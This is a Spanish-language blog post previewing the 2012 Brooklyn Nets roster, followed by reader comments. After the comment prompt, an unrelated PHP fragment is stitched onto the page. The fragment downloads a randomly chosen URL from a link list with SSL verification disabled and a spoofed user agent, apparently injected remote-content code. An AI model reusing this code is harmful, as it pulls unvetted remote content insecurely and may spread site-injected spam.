Brooklyn Nets: El dinero todo lo puede

11 de October de 2012 por Esteban
En mi análisis de los Indiana Pacers no pude dejar de hacer mención a las limitaciones financieras que sufren los mercados pequeños en la NBA y a la desventaja que significa respecto a mercados más poderosos. Hoy toca analizar la antítesis, estos nuevos Nets que, solo con una lapicera, un papel y muchos millones en el banco, han firmados contratos estratosféricos y se han vuelto competitivos de la noche a la mañana. Más competitivos que otros equipos que vienen realizando durante años un trabajo prolijo en el draft y sus contratos, como es el caso de los Pacers.

Tan es así, que con su cinco inicial llegan a la friolera cifra de (ahí va…) 71 millones en salarios. SÓLO EN SU CINCO INICIAL. Más de uno dirá que así es fácil armar un equipo contendiente y no le faltara razón, aunque no tanta como se piensa…

Pero mas allá del gasto exagerado, de contratos más largos de lo aconsejable, de regalos de rondas de draft por jugadores que terminaron fichando desde la agencia libre, terminan creando un equipo que a priori tiene el potencial para llegar a una final de conferencia. De ser el 6º peor equipo de la NBA, a quizá estar en una final de conferencia. ¿No está nada mal no?

Desde que se decidió el cambio de ciudad del equipo, los dueños sabían que si querían conquistar Brooklyn y “robarle” espectadores a los clásicos Knicks no podían llegar a la ciudad con un equipo en estado reconstrucción. Así no atraerían a un público que no les pertenece. Debían armar algo especial, algo suficientemente llamativo para que la gente se interese. Vaya si lo hicieron…

Su mayor problema ha sido el año en el que ha caído el traslado. El hecho de que no hubiera grandes agentes libres en el mercado les ha obligado a pagar de más a algunos jugadores con el objetivo de armar ese equipo que genere expectativas. Por lo gastado, si se hubiesen mudado dos años atrás, podrían haberse hecho con Wade, James, Bosh y haber renovado a Deron, sin gastar más de lo gastado este año. En lugar de eso, se hicieron con lo que tuvieron a su alcance. De todas maneras, creo que exceptuando a los Lakers, que cuentan justamente con la ventaja de ser los Lakers, son el equipo que mejor salió del mercado de agentes libres. 

Después de que CP3 y DH12 ejercieran sus opciones de un año más solo había una mega estrella libre sin restricciones en el mercado, Deron Williams, y se la quedaron. Por solo ese movimiento ya son ganadores. Además renovaron a Gerald Wallace y a Brook Lopez, dos laderos más que sólidos, y se hicieron con otro all-star a cambio tan solo de asumir su salario y sacarse de encima malos jugadores con un año de contrato. Este atractivo núcleo les permitió además agregar veteranos baratos para completar el roster. La jugada termina por salirles muy bien.

Ahora vamos a lo estrictamente deportivo:

Las posibilidades de que el equipo funcione son muchas debido al hecho de tener como puntal y jugador franquicia a un base armador capaz de manejar los tiempos e hilos de los juegos y que además puede hacer mejores a sus compañeros. Esta es la principal diferencia entre un equipo que cuenta con esa estrella y otro que se arma alrededor de un alero y un ala-pívot individualistas 100% como le pasa a los Knicks de Melo y Amare.

En la capacidad de mando y conducción de Deron Williams reposan las esperanzas de este equipo. En mi opinión creo que no podrían reposar en alguien mejor. El base puede jugar y hacer jugar, anotar y asistir, y aunque su liderazgo está algo cuestionado, es una apuesta de las más seguras que se pueden llevar a cabo actualmente.

Como segunda espada y acompañante de lujo aparece Joe Johnson. Denostado por su desproporcionado y ridículamente largo contrato, como segunda espada es más que suficiente. Su contrato es un lastre pero precisamente gracias a ello era el único all-star al que los Nets podían aspirar entregando una banda de malos jugadores. Su llegada convenció a Deron y hasta ilusionó con la posibilidad de fichar a Howard, pero ese sueño fue demasiado. JoJo aportará tiro, más tiro y la capacidad de crearse su propio lanzamiento en finales cerrados de los juegos. Si su contrato fuera adecuado, se le vería con otros ojos. Cuestiones salariales aparte, es un lujo como acompañante.

Llegamos a Gerald Wallace, quien llegó a los Nets a cambio del puesto 6 del draft que resultó ser Damien Lillard… Algunos se estarán tomando la cabeza, más aun cuando Wallace no ejerció su opción de jugador y renovó a través de la agencia libre tras firmar un pastizal. Ya hemos hablado de que los Nets podrían haberse quedado con su pick 6 y fichar desde la agencia libre igualmente a Wallace pero en fin, no todo sale como uno espera. Lo bueno es que sigue en el equipo y a pesar de que los años juegan en su contra debido a su juego físico es casi la clave de esta escuadra ya que es uno de los pocos, sino el único, jugador capaz de defender a Lebron, Melo y Pierce sin ser un obstáculo en la ofensiva de su equipo. ¿Eso vale 40 millones en 4 años? No sé si tanto pero tiene su precio… Su poder defensivo y su capacidad para adaptarse a distintas posiciones serán claves, tanto como su capacidad para anotar sin tener jugadas diseñadas para él. Pensemos que habrá muchas manos que quieran lanzar este año en Brooklyn.

Williams, Johnson y Wallace conforman el perímetro titular. Siendo este tan caro se podría pensar que el banco ha de ser un lastre. Nada de eso. Lo “especial” de este equipo ha atraído jugadores por poco valor.

C.J. Watson llega a cambio de menos de un millón la temporada, lo que le convierte en una verdadera ganga. Su última temporada fue muy buena y no tendrá muchas responsabilidades más allá de darle unos minutos de descanso a la estrella del equipo. El rookie Tyshawn Taylor mostró cosas muy buenas en el verano pero sus minutos serán muy pocos. Como escolta de recambio, Keith Bogans aportará defensa y cierto tiro abiert. Otro “muchacho” que jugará por menos de un millón al año, otro que puede considerarse una ganga. N0 hay que olvidarse del sophomore MarShon Brooks en un rol que le sentará de maravilla: saltar del banco a tirar y revolucionar los juegos. Está más que capacitado para esta tarea. No es un escolta titular de esta liga por el momento y ni siquiera un goleador confiable, pero salir del banco a lanzar puede hacerlo y creo que lo hará bien. En el puesto de alero suplente está lo peorcito del equipo. El veteranísimo Jerry Stackhouse vuelve a ser dirigido por un Avery Johnson quien sacó lo mejor de él en los Mavs. A su edad poco puede aportar por lo que no llamaría la atención que el macedonio Tornike Shengeila sume más minutos que el veterano pues tiene físico y fundamentos para encajar en este equipo. A pesar de su edad hace años que es profesional así que no es un rookie más. En caso de que ambos no funcionen siempre tendrán a mano a un Josh Childress que viene de ganarse una merecidísima amnistía. Llega acusado  de hacer perder dos años buenos de la carrera de Nash, ya que su fichaje ha sido de los peores de los que tengo memoria. ¿Puede haberse olvidado de jugar? Yo particularmente creo que sí, aunque con un contrato bajísimo y no garantizado vale la pena el riesgo. Quizá sumarse a un grupo contendiente le den más ganas de, al menos, parecerse a un jugador de básquet.

Terminamos con las baratijas del banco y volvemos a los titulares y los millonarios contratos de la dupla interior. Mientras los Nets pujaban por Howard e intentaban forzar un intercambio que mandara a Brook Lopez a Orlando, otras franquicias vieron lo que estaban descuidado a su grandote y amenazaron con ofrecerle el máximo. Los Nets, ante la imposibilidad de cerrar un acuerdo con los Magic y la latente posibilidad de perder a Lopez, ofrecieron el máximo sobre el límitey se lo quedaron, renunciando a los planes de fichar a DH12. Un contrato altísimo para el bueno de Brook, como si la temporada pasada la hubiese jugado entera y hubiese promediado un 20-10. Lopez es un 4 en un físico de un 5. Quizá al lado de otro gigante andaría mejor, pero bueno, deberá ser el cinco titular y defender a Andrew Bynum. Lo suyo no es la defensa ni el rebote, sinó la clase y la anotación, como lo demostró frente a los Mavs el año pasado en uno de sus pocos juegos donde se fue hasta los 38 puntos. Lopez debería ser el goleador del equipo, con Deron y ese perímetro debería liquidar a sus defensores en la corta y media distancia. Es el futuro de este equipo y un candidato para el  AllStar.

Cuando los Nets cierran con Lopez, sobrepasan el tope y por tanto, se encuentran que solo pueden fichar a un jugador proveniente de su propio roster con una renovación, utilizando los derechos Bird. Así lo hicieron con Kris Humpries. Su contrato parece una aberración de la naturaleza pero mirándolo bien, solo son dos años y la próxima temporada será un expiring de 12 millones que aún será de utilidad, para los propios Nets o para un posible traspaso. Kris es un anotador limitado aunque puede definir cerca del cesto. Como contraste de Lopez es un defensor comprometido y está en la élite de los reboteros de la liga. Pueden formar un gran dúo ya que las deficiencias de uno son los fuertes del otro.

Como recambio aparece el rookie Mirza Teletovic, otro “blandito”, para aportar tiro abierto, calidad de pase y elegancia. No lo tengo tan visto como los españoles pero entiendo que puede rendir y mucho. Los 4 tiradores en esta liga siempre tienen un lugar, sino díganselo a Bonner.

Reggie Evans también ficha como otra ganga. Viene de una temporada espectacular y unos PO mejores aún. Sis malos % de libres y su escasez de recursos ofensivos le condenan al banco y a contratos malos pero es uno de los mejores defensores y reboteros de la liga, además de dejarse el alma en cada jugada. Otra ganga, quizá la mayor de todas. El año pasado hasta la llegada de Martin jugó como único recambio para los interiores Clippers, de 4 y de 5, y rindió excelentemente. Le faltan centímetros pero los maquilla con esfuerzo.

Y llegamos a Andray Blatche, otro jugador amnistiado y denostado por su ex equipo. ¿Puede rendir Blatche? Estoy seguro que sí. Su salario era desproporcionado pero está lejos de ser un ex jugador como Childress. Es joven y atlético, si pone ganas puede ganarse un lugar como centro defensor y rebotero. Anotar ya sabemos que puede. No es un lujo tenerlo pero a cambio de menos de un millón no garantizado, no solo vale la pena el riesgo, sinó que no encontrarán a nadie mejor.

Así se cierra la plantilla, una plantilla que tiene de todo: rookies europeos, jugadores amnistiados, veteranísimos, jóvenes, all-stars, jugadores que vienen de lesiones… Son una caja de sorpresas pero con un director como D-Will todo es más fácil.

Son sólidos con sus titulares y tienen jugadores rendidores desde el banco. Su cinco inicial cuenta con anotadores y defensores de primer nivel, reboteadores y tripleros, por lo que poco puede achacárseles. Sí, si se cruzan con Howard los demolerá pero es el único pívot de semejante nivel en la liga y juega en la otra conferencia. Completan con un banco de suplentes de jugadores de rol, rendidores, más algunas apuestas como las de Teletovic y Blatche, que de salir bien, les darán un plus.

Después de dos años de malaria le llega la buena a Avery. Ha bancado lo peor de lo peor y le han dado el equipo que le prometieron. Es hora de que demuestre que lo suyo en los Mavs no fue casualidad.

Los veo segundos en el Este y perdiendo la final de conferencia. Soy arriesgado y lo sé, pero me gusta lo que han gestado y estoy seguro que les irá bien. Se ha dicho que han hipotecado el futuro pero no es del todo correcto. Competirán este año y el próximo, mientras Lopez, Brooks y Teletovic crecen lo suficiente para ser los futuros laderos de Williams dentro de 3 ó 4 años y así reinventarse.

Han puesto dinero y lo han gastado bien, ahora a brillar.

Lo mejor: Tener como cabeza de franquicia a Deron,  y un cinco inicial tan bueno como el de cualquiera. Gerald Wallace como defensor de elite ante los aleros estrella de la conferencia.
Lo peor: no tienen un pívot capaz de defender ni a Howard ni a Bynum, cualquiera de los dos en una serie puede destrozarlos. Hay todo un equipo por ensamblar

Quinteto Inicial: Deron Williams, Joe Johnson, Gerald Wallace, Kris Humpries, Brook Lopez
Sexto hombre: Marshon Brooks/Mirza Teletovic

Comenta

21 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Equipo renovado aunque no tanto como pudiera parecer (el único titular nuevo es JoJo). Este año se les va a exigir conforme a lo que cobran y van a ser un equipo que tenga todos los focos encima. Para mí el quinteto titular es fantástico sobre todo por fuera. Un base fenomenal que seguro que vuelve a estar al 100% este año que sabe que tiene equipo para hacer algo, un Joe Jhonson que debería también estar muy ilusionado con la oportunidad que se le presenta, un Wallace que es un lujo para un jugador al que se le va a pedir sobre todo labores defensivas y reboteadoras y dos interiores muy complementarios e incluso se han montado un banco que puede cumplir con Brooks, Teletovic y Evans. Ahora queda por ver si Deron vuelve a ser el de los Jazz y si la química del equipo prospera con la presión que van a tener pero en principio salen como candidatos a todo en el Este por debajo por supuesto de los Heat. Su lucha debería de estar por desbancar a los Celtics y los Pacers por el segundo puesto del Este y ponerse como primer equipo de New York. Ahí puede estar su lucha en Playoffs aunque todavía les veo por debajo de los verdes en unas series a 7 partidos. Muchos ojos puestos en este equipo para su primer año en Brooklyn…

      Citar

  2. Viva_Dirk dice:
    #2

    Lo peor de este equipo esta en el banco, Avery Johnson es un entrenador limitadísimo en play-offs, en una serie larga contra Rivers o Collins tiene perdida la partida seguro.

    El equipo es muy bueno sin duda, habrá que ver como encajan.

      Citar

  3. CAMPO2 dice:
    #3

    Por fin después de varios años viendo el nombre de los Nets arrastrarse por la liga han llegado los buenos tiempos.

    Uno de sus mejores Fichajes es Jay -Z que ha vendido el producto brooklyn nets mejor que nadie, y es la cara visible de este proyecto

      Citar

  4. TheDeerHunter dice:
    #4

    Talonario potente… pero a ver cómo se manejan en la práctica.
    Intuyo que pueden hacer una gran regular. Sin grandes problemas se pueden meter en un top3 del Este con un buen número de victorias ¿¿+-55??
    En playoffs, obra y gracia de Avery Johnson, les doy segunda ronda como techo.

      Citar

  5. Laker1899 dice:
    #5

    Buenas

    No creo que este equipo haya tenido cambios tan sustanciales como para ser considerado la alternativa a los Heat en la conferencia este. Tal como ha dicho GreenPride tan solo hay una cara nueva en el que a priori deberia ser el quinteto inicial, y aunque se trate de un gran jugador no creo que dote al equipo de el salto cualitativo que los situaria por delante de Celtics, y aun menos de cara a Playoffs. En mi opinion el factor que mas determinara el rumbo de los Nets durante la temporada seran las nuevas incorporaciones de perimetro que salgan desde el banquillo. Espero que este año veamos el mejor Deron Williams hasta ahora, creo que se dan todas las condiciones para que sea asi (jugador franquicia, plantilla mejorada y proyecto ambicioso).

    Tengo la imrpesion de que este año aun estaran por debajo de los Knicks. Los veo 6º o 7º y en semifinal de conferencia como mucho.

      Citar

  6. GreenPride dice:
    #6

    Que Avery Johnson es un zoquete y más rígido que un palo a la hora de leer partidos no seré yo el que lo discuta desde luego. Creo que ese puede ser uno de sus grandes problemas, sobre todo si tiene que hacer frente a Doc Rivers o Collins en una eliminatoria a siete partidos que decida quien va a las finales de conferencia. Yo creo que les va a costar arrancar en la regular con tanta expectacion y jugadores nuevos pero que lo van a hacer bien y creo que su objetivo debería ser la ventaja de campo en esa supuesta segunda ronda, es decir, quedar segundos del Este para tener alguna opción frente a los Pacers o sobre todo los Celtics. Yo este año no les veo en la final de conferencia pero con continuidad y algún retoque quizás el año que viene sí

      Citar

  7. CAMPO2 dice:
    #7

    Yo creo que quedaran entre los 4 primeros y según los emparejamientos llegaran a finales de conferencia.

      Citar

  8. CAMPO2 dice:
    #8

    JoJo sin la responsabilidad de ser el jugador franquicia jugara bastante bien, ya que sera D-Will quien lleve el peso del equipo y quien decida las jugadas por lo que no tendra que forzar muchas jugadas JoJo

      Citar

  9. rumbero dice:
    #9

    Si Deron se pone el mono de trabajo que le convierte en base Top-3 de la liga, este equipo debería seguir una línea parecida a la de los Clippers el año pasado. Teniendo en cuenta que están en el este y que al quinteto inicial han acabado añadiendo un banquillo más que aceptable pueden incluso dar guerra en segunda ronda. Para ello deberían quedar entre los 4 primeros, y como dice Deer pueden hacerlo (luego un primer cruce con los Knicks, los eliminan y objetivo cumplido)
    Análisis muy completo por cierto, y además he aprendido una palabra nueva como “prolijo” 😀

      Citar

  10. nba dice:
    #10

    Deberían estar luchando codo con codo , con Indiana por hacerse con la 3 plaza en el Este, un quinteto interesante y resolutivo.Veremos si los jugadores interiores aportan de manera mas consistente

      Citar

  11. Esteban dice:
    #11

    Muchachos seamos serios, los que dicen que el equipo no cambio y que solo tienen un titular nuevo, vamos gente

    Lopez no jugo en toda la temp pasada, wallace llego a mitad de temporada y apenas jugo, y deron y humpries sufieron lesiones, mientras que su banco, sacando a brooks es todo nuevo

      Citar

  12. The wolf dice:
    #12

    rumbero:

    luego un primer cruce con los Knicks, los eliminan y objetivo cumplido

    Que bonito seria un duelo Nets-Nicks en PO… digno de ver

      Citar

  13. nanoke dice:
    #13

    este equipo en dos años esta desmantelado y el rusio dejandolo en la ruina, me explico
    deron es un gran jugador, para mi quizas el base con mas talento pero es un pesetero, problemas en utah y tendra problemas en nets
    joe johnson esta ya en su cuesta abajo, jauks se lo quiso quitar de encima y ahora esta con un pastizal en nets, aboserve demasiado balon, cosa mala para deron y el ekipo
    gerald wallace es un gran jugador de ekipo pero ya en cuesta abajo, no tiene la explosividad de hace un par de años.
    humpries, casi el tipo msa fiable dek ekipo, una garantia de esfuerzo y puntos
    brook lopez, ya no engaña a nadie, en cuanto juega 10 partidos seguidos adios su fisico

    banco: mejor ni hablamos

      Citar

  14. Esteban dice:
    #14

    nanoke:
    este equipo en dos años esta desmantelado y el rusio dejandolo en la ruina, me explico
    deron es un gran jugador, para mi quizas el base con mas talento pero es un pesetero, problemas en utah y tendra problemas en nets
    joe johnson esta ya en su cuesta abajo, jauks se lo quiso quitar de encima y ahora esta con un pastizal en nets, aboserve demasiado balon, cosa mala para deron y el ekipo
    gerald wallace es un gran jugador de ekipo pero ya en cuesta abajo, no tiene la explosividad de hace un par de años.
    humpries, casi el tipo msa fiable dek ekipo, una garantia de esfuerzo y puntos
    brook lopez, ya no engaña a nadie, en cuanto juega 10 partidos seguidos adios su fisico

    banco: mejor ni hablamos

    en dos años? es muy probable que este equipo este desmantelado tal como se ve ahora, pero no necesariamente signifique que sean malos

    me explico

    humpries, ya no estara en el equipo en dos años, ya que la proxima temporada es un expiring de 12 millones

    en dos años, jojo tendra “solo” dos años mas de contrato, si los dos mas pesados y donde menos rendira, pero no seran tan INTRANSFERIBLE como ahora, en su ultimo año sera un expiring de nada menos que 20 millones, hasta entonces aun puede rendir

    en dos años, wallace estara a la baja es cierto, pero le quedaran dos años, a razon de 10 millones cada uno, otro que tampoco seria intransferible, y viendo como se elevan los contratos todos los años, hasta podria parecer barato si mantiene su nivel

    y como ya dije en el analisis, mientras son competitivos con estos hombres, el tiempo pasa y deberan ir creciendo LOPEZ, BROOKS, TAYLOR y TELETOVIC
    si estos muchachos progresan lo suficiente, son jovenes y dentro de dos años estaran en una buena edad

    no son un equipo armado para futuro sino para presente, si en dos años los NETS seran viejos, que queda para decir de los LAKERS? pero de ellos nadie mira a mas de dos años

    amigo, dos años es mucho tiempo

      Citar

  15. Sancho88 dice:
    #15

    Bueno, lo primero y principal, felicitarte por el análisis. Me ha parecido uno de los más completos (si no el más completo) de todos los que llevamos.

    Yo, como rumbero, también he aprendido una palabra nueva: “ladero”, jejej. Esa me la apunto.

    Sobre Mirza, me ha sorprendido que pongas de él que es “blandito”. Lo era hasta hace dos años, pero en el Eurobasket de Lituania de 2011 dio un cambio espectacular. Creo que ese verano lo había comenzado con aquella final impresionante ganando al Barsa de Ricky Rubio y Navarro, con aquella bandeja de San Emeterio. Después, con Bosnia, estuvo a gran nivel (aunque no recuerdo si pasaron de ronda) en un dificilísimo torneo como es el Eurobasket, con un equipo muy limitado. Y ya la pasada temporada, después de aquel verano, se vio su evolución. Físicamente siempre había sido un portento, aunque lógicamente su 2,06 le lastrará en la NBA, donde te puedes encontrar gente de 7 pies jugando de 4… No obstante, has dicho que el equipo no tiene un recambio de garantías para Wallace. Correcto, ni Childress, ni mucho menos Stackhouse, parecen dos tipos con la calidad suficiente para jugar ahora mismo en un contender. Y yo creo que Mirza sí puede adaptar su rol al del 3 o 4 abierto, royo Garbajosa cuando llegó, tiene un lanzamiento muy pulido, conoce a la perfección el juego en la zona, tiene mucha experiencia internacional en Europa, algo que se valora mucho en la NBA, y, sobre todo, y solo para matizar lo de “blandito”, te diré que no, que ha cambiado mucho y el año pasado ya demostró que se ha convertido en un tipo duro que se pega con quien haga falta.

    No sé, debería salir bien la apuesta de Phrokorov, pienso yo. Como bien dices, el equipo tiene de todo, y no creo en los declives de grandes jugadores que se juntan para un proyecto ambicioso. Estamos hablando de tipos que ya han ganado todo el dinero que desearían en la vida, que lo van a seguir ganando, pero lo más importante… todo estos están a dos velas en cuanto a pedrolos en las manos. Quieren un anillo. Deron quiere un anillo y yo no veo el declibe por ninguna parte. Al contrario. Ahora van a competir en un mercado grandísimo por quitar cuota de pantalla a los sacrosantos Knicks, y me parece que viendo el parque jurásico “Jurassic Knicks”, jejeje, como lo llaman en Estados Unidos, muchos se van a enganchar al nuevo proyecto, igual que ha pasado en Los Ángeles con los nuevos Clippers.

    Particularmente, no estoy muy de acuerdo con los proyectos que tiran de talonario, pero está claro que si quieres competir por el anillo lo tienes que hacer. Además, si les sale todo mal, como decís, muchos serán expriring el año que viene y podrían desmantelar honrosamente el proyecto sin pagar el temido impuesto en 2014.

    Lo dicho, me ha encantado el análisis. A ver con qué nos sorprenden estos Nets. Hay ganas de ver a López sano al cien por cien, a Johnson compitiendo por algo, no como en estos últimos años de Atlanta, y a Deron llevando por fin una nave con aspiraciones a algo. Me da la impresión de que este año veremos si Deron Williams es top, como dice Mourinho, o simplemente es un maquillador estilista, individualista y con poca cabeza, como ha demostrado hasta ahora.

    Creo que estarán alrededor de las 50-55 victorias, y su lugar es pelear en las finales de conferencia con los Heat.

      Citar

  16. Esteban dice:
    #16

    gracias sancho! como ya aclare no tengo tan visto a teletovic, sera por su calse, su tiro o por que es blanco que me daba la impresion de “blandito”, pero veo que lo conoces mas y no es asi

    tambien lo pense como 3 abierto, pero me hice la idea de que no tiene la velocidad ni la agilidad para bajar el culo y defender a los super atletas que juegan de aleros en la nba

    ah y tanto prolijo como ladero, son palabras muy usadas en la argentina ejejeje

      Citar

  17. Sancho88 dice:
    #17

    Sí, te puedo asegurar que no ibas desencaminado viéndole cumplir ese rol. En realidad es un alero alto que sabe jugar el poste bajo bastante bien, se pega con quien sea, y además tiene un tiro exterior muy bueno. Algo así como un Nocioni pero con más calidad, a mi juicio. Yo creo que le veremos mucho como alero. Hombre, defendiendo puede tener sus limitaciones en la NBA, para qué nos vamos a engañar, pero tampoco es malo, que conste

      Citar

  18. Esteban dice:
    #18

    Si rinde como nocioni en sus años en los bulls, puede ser una gran adquisicion, ya vimos que el banco de los nets mo es gran cosa, pero con un jugador medianamente determinante desde la banca, pueden volverse mas peligrosos aun

      Citar

  19. Esteban dice:
    #19

    FE DE ERRATAS

    Tornike Shengelia, NO es macedonio sino georgiano

    disculpe

      Citar

  20. lost dice:
    #20

    Lo que me preocupa de este equipo es el nivel que dará en los PO. En mi opinión, este equipo hará una buena Regular Season, pero será en PO cuando se la va a meter. Tanto Avery, como con algunos jugadores importantes del roster, me dan muchas dudas en PO. De Miami en PO no dudo, por tener a LeBron, Wade y Bosh(ahora con Allen); de Boston tampoco, Doc Rivers y Rondo-Pierce-Garnett son seguro de vida en los momentos cruciales, solo por las Finales de Conferencia del pasado año. De los Pacers y de los Knicks tengo alguna duda, pero me parece que Indiana tiene un equipo serio y los Knicks han fichado a jugadores para rendir mejor en los PO(cambiar a Toney Douglas por Kidd en PO es…), para que aporten seriedad al equipo, no tanto en la RS pero si en PO. Lo demás en el Este, exceptuando a Sixers y Bulls-sin Rose-, es carne de primera ronda.

      Citar

  21. Esteban dice:
    #21

    Bueno sensaciones de los partidos de pretemporada, de este equipo al cual analize

    en primer lugar Brook Lopez, promediando 18.5 ppp y el numerado de 9.5 rebotes por juego, se le ve con un fisico mas imponente y con el toque intacto, el mejor pivot de la liga en ese sentido

    al 5 inicial le falta complarse muchisimo, todos qwuieren tirar y resolver, momentos fantasticos de deron frente a wizards

    sobre la mayor incognita su banco:

    al parecer, la segunda unidad se compone en el puesto de alero por josh childress, quien parece cualquier cosa menos un basquetbolista, y stackhouse, no juega ni cuando lo every dio descanso a los titulares

    tambien blatche sale como primer alternativa a lopez, aprovechando los juegos livianos como es su costumbre, esta metiendo puntos de todos lados, creo que sirve de poco y debera demostrar algo cuando los juegos sean duros, no ahora

    los rookies:

    llegamos a TELEWTOVIC, quien esta sintiendo el tiro, si que si, ayer con muinutos se fue hasta los 18 puntos, con un 4/10 en triples y 4 rebotes
    y otro que aprovecho la ausencia de los titulares fue shengelia, para jugsarse 25 minutos e irse hasta los 11 puntos y una volcada yanki

    hay futuro con estos dos muchachos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>